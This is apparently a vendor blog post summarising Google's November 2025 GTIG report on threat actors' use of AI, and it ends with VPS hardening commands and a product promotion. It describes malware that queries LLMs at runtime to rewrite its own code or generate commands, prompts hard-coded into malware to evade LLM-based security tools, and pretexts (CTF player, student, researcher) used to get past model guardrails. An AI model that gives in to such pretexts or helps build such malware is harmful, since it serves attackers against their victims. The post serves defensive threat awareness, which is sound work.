๐ฅ Download the Full Report
Official Google Report: GTIG AI Threat Tracker - Advances in Threat Actor Usage of AI Tools (November 2025)
Download PDF Report (742 KB)Source: Google Threat Intelligence Group (GTIG) | Published: November 2025
Executive Summary: A New Phase of AI-Enabled Cyber Threats
The Google Threat Intelligence Group (GTIG) has published a groundbreaking report documenting a critical evolution in cyber threats: adversaries have moved beyond using AI for productivity gains and are now deploying novel AI-enabled malware in active operations.
This marks what Google calls "a new operational phase of AI abuse" involving tools that dynamically alter their behavior mid-executionโsomething that was previously theoretical is now a documented reality.
Report Overview
- Publisher: Google Threat Intelligence Group (GTIG)
- Release Date: November 2025
- Report Type: Update to January 2025 "Adversarial Misuse of Generative AI" analysis
- Scope: Analysis of broader threat landscape, state-sponsored actors, and cybercrime markets
- Key Focus: How government-backed threat actors and cyber criminals integrate AI throughout the entire attack lifecycle
๐จ Key Findings: Four Critical Developments
1. First Use of "Just-in-Time" AI in Malware
For the first time, GTIG has identified malware families that use Large Language Models (LLMs) during execution. These tools represent a significant leap toward autonomous and adaptive malware:
Novel AI-Enabled Malware Identified:
- PROMPTFLUX: VBScript dropper that uses Google Gemini API to rewrite its own source code hourly to evade detection
- PROMPTSTEAL: Data miner used by Russian APT28 against Ukraine that queries LLMs to generate commands for execution
- PROMPTLOCK: Cross-platform ransomware that dynamically generates malicious Lua scripts at runtime
- FRUITSHELL: Reverse shell with hard-coded prompts to bypass LLM-powered security systems
- QUIETVAULT: Credential stealer that leverages AI to search for secrets on infected systems
These tools dynamically generate malicious scripts, obfuscate their own code to evade detection, and leverage AI models to create malicious functions on demand rather than hard-coding them into the malware.
2. Social Engineering to Bypass AI Safeguards
Threat actors have developed sophisticated techniques to circumvent AI safety guardrails:
- CTF Pretexts: Actors pose as students in "capture-the-flag" cybersecurity competitions
- Research Personas: Claiming to be cybersecurity researchers conducting legitimate studies
- Academic Cover: Pretending to write university papers on security topics
These social engineering tactics persuade AI models like Gemini to provide information that would otherwise be blocked, enabling tool development and vulnerability exploitation.
3. Maturing Cybercrime Marketplace for AI Tooling
The underground marketplace for illicit AI tools has significantly matured in 2025. GTIG identified multiple offerings of multifunctional tools designed to support:
๐ญ Deepfakes
Create lure content for phishing or bypass KYC requirements
๐ฆ Malware Generation
Create custom malware or improve existing threats
๐ฃ Phishing Support
Generate engaging content and distribute campaigns
๐ Vulnerability Research
Identify and exploit security weaknesses
Notable underground AI tools identified: DarkDev, EvilAI, FraudGPT, LoopGPT, MalwareGPT, NYTHEON AI, SpamGPT, WormGPT, Xanthorox
4. State-Sponsored Actors Augment Full Attack Lifecycle
State-sponsored actors from North Korea, Iran, and the People's Republic of China (PRC) continue to misuse Gemini to enhance all stages of their operations:
- Initial Compromise: Reconnaissance, phishing lure creation, vulnerability scanning
- Establish Foothold: Malware development, C2 infrastructure setup
- Escalate Privileges: Exploit research, privilege escalation techniques
- Lateral Movement: Network enumeration, cloud infrastructure attacks
- Maintain Presence: Webshell creation, persistence mechanisms
- Complete Mission: Data exfiltration scripts, credential theft tools
๐ฌ Deep Dive: PROMPTFLUX - Self-Modifying Malware
GTIG's discovery of PROMPTFLUX in June 2025 represents a watershed moment in cybersecurity. This experimental dropper malware demonstrates how threat actors are using LLMs for dynamic obfuscation.
How PROMPTFLUX Works:
- Initial Execution: Written in VBScript, PROMPTFLUX decodes and executes an embedded decoy installer
- AI-Powered Regeneration: Uses Google Gemini API with hard-coded key to query for code rewriting
- Dynamic Obfuscation: Prompts the LLM to rewrite its own source code on an hourly basis
- Persistence: Saves new, obfuscated versions to the Startup folder
- Propagation: Attempts to spread by copying itself to removable drives and network shares
Current Status: GTIG intelligence indicates PROMPTFLUX is in development/testing phase and currently does not demonstrate ability to compromise victim networks. Google has disabled associated assets and strengthened model protections.
โ๏ธ APT28 Deploys PROMPTSTEAL Against Ukraine
In June 2025, GTIG identified the Russian government-backed actor APT28 (aka FROZENLAKE) using new malware tracked as PROMPTSTEAL (reported by CERT-UA as LAMEHUG) against targets in Ukraine.
PROMPTSTEAL Capabilities:
- LLM Query System: Queries Qwen2.5-Coder-32B-Instruct via Hugging Face API
- Command Generation: LLM generates commands for malware to execute rather than hard-coding them
- Deception: Masquerades as "image generation" program to guide users through prompts
- Data Collection: Generates commands to collect system information and targeted documents
- Blind Execution: Commands are blindly executed locally before output is exfiltrated
Significance: APT28's use of PROMPTSTEAL constitutes GTIG's first observation of malware querying an LLM deployed in live operations.
๐ State-Sponsored Threat Actor Activities
๐จ๐ณ China-Nexus Actors
Chinese threat actors demonstrated extensive Gemini misuse across the attack lifecycle:
- Social Engineering: Used CTF pretexts to bypass safety responses
- Exploitation: Developed Python scripts to scan for vulnerable Roundcube and Zimbra email servers
- Mass Exploitation: Used n-day exploits against email servers
- Malware Development: Created tools in Python, C#, PHP, Ruby, and Go
- C2 Infrastructure: Developed malware backend using WeChat for command and control
- Cloud Attacks: Researched AWS EC2 credentials and Kubernetes exploitation
๐ฐ๐ต North Korean Actors
UNC1069 (aka MASAN) targeted cryptocurrency infrastructure:
- Cryptocurrency Research: Used Gemini to research wallet application data locations
- Multi-Language Campaigns: Generated Spanish-language lures to expand targeting
- Deepfake Usage: Leveraged deepfake images and videos impersonating cryptocurrency industry individuals
- Social Engineering: Distributed BIGMACHO backdoor via fake "Zoom SDK" downloads
UNC4899 (aka PUKCHONG) focused on supply chain compromise and exploit development for edge devices and modern browsers.
๐ฎ๐ท Iranian Actors
TEMP.Zagros (aka MUDDYCOAST, Muddy Water) evolved from using public tools to custom malware development:
- Custom Malware: Developed webshells and Python-based C2 servers
- Bypass Techniques: Used "student" and "researcher" pretexts to bypass safety guardrails
- OPSEC Failures: Revealed C2 domains and encryption keys while asking Gemini for help with scripts
APT42 focused on sophisticated phishing campaigns:
- Impersonation: Created lures impersonating prominent think tanks and organizations
- Data Processing: Attempted to build "Data Processing Agent" to convert natural language queries into SQL for sensitive data analysis
- Translation Services: Used Gemini to translate specialized vocabulary for targeted campaigns
๐ท๐บ APT41 (China) - Code Development
Demonstrated sophisticated technical support usage:
- C2 Development: Sought assistance with C++ and Golang code for OSSTUN C2 framework
- Obfuscation: Researched code obfuscation using publicly available libraries
- Multi-Platform Targeting: Targeted mobile and desktop systems across multiple operating systems
๐ก๏ธ Google's Response and Mitigation Efforts
Google has taken proactive steps to counter these threats:
Immediate Actions:
- Account Termination: Disabled projects and accounts associated with malicious actors
- Asset Disruption: Disabled C2 infrastructure and hard-coded API keys found in malware
- Threat Intelligence Sharing: Shared findings with security community and law enforcement
Model Improvements:
- Classifier Strengthening: Enhanced detection of malicious prompt patterns
- Model Hardening: Improved model-level protections against misuse
- Safety Responses: Refined safety guardrails to better detect social engineering attempts
Broader Security Framework:
- Secure AI Framework (SAIF): Conceptual framework for securing AI systems
- Red Teaming: Automated evaluation framework for testing AI vulnerabilities
- Big Sleep: AI agent for finding security vulnerabilities in software
- CodeMender: Experimental AI-powered agent for automatically fixing code vulnerabilities
- Google AI Principles
- Advancing Gemini's Security Safeguards (White Paper)
๐ฎ Future Threat Landscape Predictions
Based on GTIG's analysis, security professionals should anticipate:
Expected Developments:
- Increased Autonomous Malware: More malware leveraging runtime AI for dynamic adaptation
- Lower Barrier to Entry: Underground AI tools enabling less sophisticated actors to conduct complex attacks
- Advanced Obfuscation: AI-powered polymorphic and metamorphic malware becoming commonplace
- Sophisticated Social Engineering: AI-generated deepfakes and personalized phishing at scale
- Automated Vulnerability Discovery: AI systems identifying and exploiting zero-days faster than patches can be deployed
๐ก๏ธ Protecting Your VPS Infrastructure
In light of these evolving AI-enabled threats, securing your VPS infrastructure has never been more critical:
Essential Security Measures:
# 1. Implement Multi-Factor Authentication
# 2. Use SSH Key Authentication Only
sudo nano /etc/ssh/sshd_config
# Set: PasswordAuthentication no
# 3. Install and Configure Fail2Ban
sudo apt install fail2ban -y
sudo systemctl enable fail2ban
# 4. Enable Automatic Security Updates
sudo apt install unattended-upgrades -y
# 5. Configure Intrusion Detection
sudo apt install aide -y
sudo aideinit
# 6. Monitor System Logs
sudo apt install logwatch -y
# 7. Implement Network Segmentation
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
For comprehensive VPS security guidance, see our VPS Security Basics and VPS Hacked Response Guide.
Secure Your VPS Against AI-Powered Threats
VPS Commander provides one-click security hardening workflows: configure firewalls, set up fail2ban, monitor suspicious activity, and audit all server changesโall without touching the terminal.
Get Started with VPS Commander๐ Related Resources
- Complete VPS Security Guide
- VPS Hacked? Response & Recovery Steps
- VPS Performance & Security Monitoring
- SSH Key Authentication Setup
Conclusion: A Paradigm Shift in Cybersecurity
Google's November 2025 threat intelligence report documents a fundamental shift in the cyber threat landscape. The evolution from AI as a productivity tool to AI as an active component of malware represents a new era of adaptive, intelligent threats.
Key Takeaways:
- AI-enabled malware is now operational: Tools like PROMPTFLUX and PROMPTSTEAL are being deployed in active campaigns
- State actors lead innovation: APT groups from Russia, China, Iran, and North Korea are at the forefront
- Underground markets are maturing: Commercial AI-powered attack tools lower the barrier to entry
- Social engineering evolves: Threat actors successfully bypass AI safety guardrails using pretexts
- Defense must adapt: Traditional signature-based detection is insufficient against runtime-generated malware
๐ฅ Download the Full Report
Official Google Report: GTIG AI Threat Tracker - Advances in Threat Actor Usage of AI Tools (November 2025)
Download PDF Report (742 KB)Source: Google Threat Intelligence Group (GTIG) | Published: November 2025
About this article: This comprehensive analysis is based on the official Google Threat Intelligence Group (GTIG) report "AI Threat Tracker: Advances in Threat Actor Usage of AI Tools" published in November 2025. All malware names, threat actor designations, and technical details are sourced directly from Google's original research.